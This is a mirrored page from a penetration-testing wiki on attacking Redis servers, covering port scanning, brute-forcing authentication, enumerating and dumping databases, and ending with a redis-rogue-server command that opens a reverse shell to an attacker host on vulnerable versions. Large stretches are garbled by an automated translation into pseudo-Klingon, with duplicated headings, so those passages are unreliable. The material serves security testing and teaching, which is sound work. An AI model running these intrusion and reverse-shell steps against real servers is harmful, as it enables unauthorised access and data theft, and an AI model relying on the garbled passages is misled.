Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-24 21:53:54 +00:00

Translator workflow b442ae90c4 Translated to Klingon

2024-02-10 17:52:19 +00:00

42 KiB

Raw Blame History

6379 - Pentesting Redis

htARTE (HackTricks AWS Red Team Expert) !HackTricks!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!

Hacking Insights
Engage with content that delves into the thrill and challenges of hacking

Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights

Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates

Join us on Discord and start collaborating with top hackers today!

Basic Information

From the docs: Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker).

By default Redis uses a plain-text based protocol, but you have to keep in mind that it can also implement ssl/tls. Learn how to run Redis with ssl/tls here.

Default port: 6379

PORT     STATE SERVICE  VERSION
6379/tcp open  redis   Redis key-value store 4.0.9

Automatic Enumeration

Some automated tools that can help to obtain info from a redis instance:

Nmap

Nmap is a powerful network scanning tool that can be used to discover open ports and services running on a target system. To scan for open Redis ports, you can use the following command:

nmap -p 6379 <target_ip>

Redis-cli

Redis-cli is the official command-line interface for Redis. It allows you to interact with a Redis server and execute commands. To connect to a Redis server, you can use the following command:

redis-cli -h <target_ip> -p 6379

Once connected, you can execute various commands to gather information about the Redis instance.

Redis Desktop Manager

Redis Desktop Manager is a GUI tool that provides a convenient way to manage Redis databases. It allows you to connect to a Redis server and perform various operations, such as browsing keys, executing commands, and monitoring server activity.

Redis-stat

Redis-stat is a command-line tool that provides real-time monitoring and statistics for Redis servers. It can display information about the number of connected clients, memory usage, CPU usage, and other metrics.

Redis Sentinel

Redis Sentinel is a high-availability solution for Redis. It monitors Redis instances and automatically performs failover when a master node becomes unavailable. By querying the Sentinel API, you can obtain information about the Redis instances being monitored.

Metasploit

Metasploit is a popular penetration testing framework that includes a module for Redis enumeration. The auxiliary/scanner/redis/redis_server_info module can be used to gather information about a Redis server, such as version, operating system, and configuration settings.

Other Tools

There are also other tools available, such as redis-info, redis-cli-info, and redis-info.sh, that can be used to obtain information about a Redis instance. These tools provide detailed information about the Redis server, including memory usage, CPU usage, and network statistics.

nmap --script redis-info -sV -p 6379 <IP>
msf> use auxiliary/scanner/redis/redis_server

QaD jImej

Banner

Redis tetlh based protocol vItlhutlh. Socket vItlhutlh command bI'el 'ej pong values readable. Redis ssl/tls run vItlhutlh (ghorgh weird).

Redis instance regular connect nc vaj redis-cli vaj:

nc -vn 10.10.10.10 6379
redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools

Qav 'op Doch info. 'Iv may output Redis instance information or something like the following returned:

-NOAUTH Authentication required.

Redis Authentication

QaStaHvIS Redis ghItlh credentials valid luq access.

Redis Authentication

QaStaHvIS Redis ghItlh credentials valid luq access. However, it can be configured to support only password, or username + password.
It is possible to set a password in redis.conf file with the parameter requirepass or temporary until the service restarts connecting to it and running: config set requirepass p@ss$12E45.
Also, a username can be configured in the parameter masteruser inside the redis.conf file.

{% hint style="info" %} If only password is configured the username used is "default".
Also, note that there is no way to find externally if Redis was configured with only password or username+password. {% endhint %}

In cases like this one you will need to find valid credentials to interact with Redis so you could try to brute-force it.
In case you found valid credentials you need to authenticate the session after establishing the connection with the command:

AUTH <username> <password>

Valid credentials will be responded with: +OK

Authenticated enumeration

If the Redis server permits anonymous connections or if you have obtained valid credentials, you can initiate the enumeration process for the service using the following commands:

tlhIngan Hol translation:

QawHaq credentials vItlhutlhlaH: +OK

Authenticated enumeration

Redis server anonymous connections choHwI'pu' Redis server valid credentials ghaH, commands vItlhutlhlaH:

INFO
[ ... Redis response with info ... ]
client list
[ ... Redis response with connected clients ... ]
CONFIG GET *
[ ... Get config ... ]

bIQa'mey Redis chu' pagh 'ej chu' pagh.

QaH Redis bIQa'mey redis.conf file renamed 'ej removed Dochmey. Qapla' line FLUSHDB Dochmey:

rename-command FLUSHDB ""

More about configuring securely a Redis service here: https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04

You can also monitor in real time the Redis commands executed with the command monitor or get the top 25 slowest queries with slowlog get 25

Find more interesting information about more Redis commands here: https://lzone.de/cheat-sheet/Redis

Dumping Database

Inside Redis the databases are numbers starting from 0. You can find if anyone is used in the output of the command info inside the "Keyspace" chunk:

Or you can just get all the keyspaces (databases) with:

INFO keyspace

DaH jImej database 0 je 1 ghItlh. Database 0 4 keyvam je database 1 1 ghItlh. Redis database 0 DaH ghItlh. database 1 ghItlh dump ghItlh 'ej ghItlh 'e' ghItlh ghItlh.

SELECT 1
[ ... Indicate the database ... ]
KEYS *
[ ... Get Keys ... ]
GET <KEY>
[ ... Get Key ... ]

ghItlh -WRONGTYPE Operation against a key holding the wrong kind of value vItlh GET <KEY> cha'logh 'e' vItlhutlh. vaj vItlhutlh string be'Hom integer 'ej vItlhutlh vItlhutlh 'e' vItlhutlh.

vItlhutlh vItlhutlh type, 'ej, 'ej list hash vItlhutlh, 'ejmeyvam example.

TYPE <KEY>
[ ... Type of the Key ... ]
LRANGE <KEY> 0 -1
[ ... Get list items ... ]
HGET <KEY> <FIELD>
[ ... Get hash item ... ]

Dump the database with npm redis-dump or python redis-utils

Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!

Hacking Insights
Engage with content that delves into the thrill and challenges of hacking

Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights

Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates

Join us on Discord and start collaborating with top hackers today!

Redis RCE

Interactive Shell

redis-rogue-server can automatically get an interactive shell or a reverse shell in Redis(<=5.0.5).

./redis-rogue-server.py --rhost <TARGET_IP> --lhost <ACCACKER_IP>